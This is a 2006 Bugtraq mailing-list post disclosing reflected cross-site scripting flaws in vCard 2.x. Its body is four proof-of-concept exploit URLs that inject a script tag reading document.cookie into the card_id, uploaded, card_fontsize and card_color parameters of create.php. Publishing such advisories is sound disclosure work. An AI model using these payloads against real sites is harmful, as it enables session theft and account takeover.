[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
XSS in vCard
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: XSS in vCard
- From: xx_hack_xx_2004@xxxxxxxxxxx
- Date: 11 Mar 2006 18:20:24 -0000
Hello
Vulnerable: vCard 2.x
http://www.belchiorfoundry.com
Exploit :
http://example.com/vcard/create.php?card_id='><script>alert(document.cookie)</script>
http://example.com/vcard/create.php?uploaded='><script>alert(document.cookie)</script>
http://example.com/vcard/create.php?card_fontsize='><script>alert(document.cookie)</script>
http://example.com/vcard/create.php?card_color='><script>alert(document.cookie)</script>
Discovery by Linux_Drox
http://www.lezr.com
Best Regards